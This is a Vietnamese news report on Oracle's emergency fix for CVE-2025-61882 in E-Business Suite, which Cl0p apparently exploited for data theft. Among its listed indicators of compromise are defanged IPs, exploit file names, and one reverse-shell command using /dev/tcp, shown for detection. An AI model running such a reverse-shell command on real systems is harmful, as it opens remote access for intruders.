Oracle vừa phát hành một bản cập nhật khẩn cấp để khắc phục lỗ hổng bảo mật nghiêm trọng trong E-Business Suite của mình, mà theo hãng này, đã bị khai thác trong làn sóng tấn công đánh cắp dữ liệu gần đây của nhóm Cl0p.
Lỗ hổng, được theo dõi với mã CVE-2025-61882 (CVSS score: 9.8), liên quan đến một lỗi chưa xác định có thể cho phép kẻ tấn công không cần xác thực, với quyền truy cập mạng qua HTTP, xâm nhập và kiểm soát thành phần Oracle Concurrent Processing.
Trong một khuyến cáo, Oracle cho biết: "Lỗ hổng này có thể bị khai thác từ xa mà không cần xác thực, tức là nó có thể bị khai thác qua mạng mà không cần tên người dùng và mật khẩu." Hãng nói thêm: "Nếu khai thác thành công, lỗ hổng này có thể dẫn đến remote code execution."
Trong một cảnh báo riêng biệt, Giám đốc An ninh của Oracle, Rob Duhart, cho biết công ty đã phát hành các bản vá cho CVE-2025-61882 nhằm "cung cấp các bản cập nhật chống lại các khai thác tiềm năng bổ sung được phát hiện trong quá trình điều tra của chúng tôi."
Với tư cách là các indicators of compromise (IoCs), công nghệ này đã chia sẻ các địa chỉ IP và artifacts sau, cho thấy khả năng nhóm Scattered LAPSUS$ Hunters cũng có liên quan đến việc khai thác:
- 200.107.207[.]26 (Hoạt động GET và POST tiềm năng)
- 185.181.60[.]11 (Hoạt động GET và POST tiềm năng)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Thiết lập kết nối TCP outbound qua một cổng cụ thể)
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
Thông tin về lỗ hổng zero-day của Oracle được đưa ra vài ngày sau khi có các báo cáo xuất hiện về một chiến dịch mới, nhiều khả năng do nhóm ransomware Cl0p thực hiện, nhắm mục tiêu vào Oracle E-Business Suite. Mandiant thuộc Google đã mô tả hoạt động đang diễn ra này là một "chiến dịch email quy mô lớn" được khởi động từ hàng trăm tài khoản bị xâm nhập.
Trong một bài đăng trên LinkedIn, Charles Carmakal, CTO của Mandiant tại Google Cloud, cho biết: "Cl0p đã khai thác nhiều lỗ hổng trong Oracle EBS, cho phép chúng đánh cắp một lượng lớn dữ liệu từ một số nạn nhân vào tháng 8 năm 2025," và nói thêm rằng "nhiều lỗ hổng đã bị khai thác, bao gồm các lỗ hổng đã được vá trong bản cập nhật tháng 7 năm 2025 của Oracle cũng như một lỗ hổng đã được vá vào cuối tuần này (CVE-2025-61882)."
Carmakal lưu ý: "Với việc khai thác zero-day rộng rãi đã xảy ra (và việc khai thác n-day có thể sẽ tiếp tục bởi các tác nhân khác), bất kể khi nào bản vá được áp dụng, các tổ chức nên kiểm tra xem liệu họ đã bị xâm phạm hay chưa."
(Đây là một câu chuyện đang được cập nhật. Vui lòng kiểm tra lại để biết thêm chi tiết.)
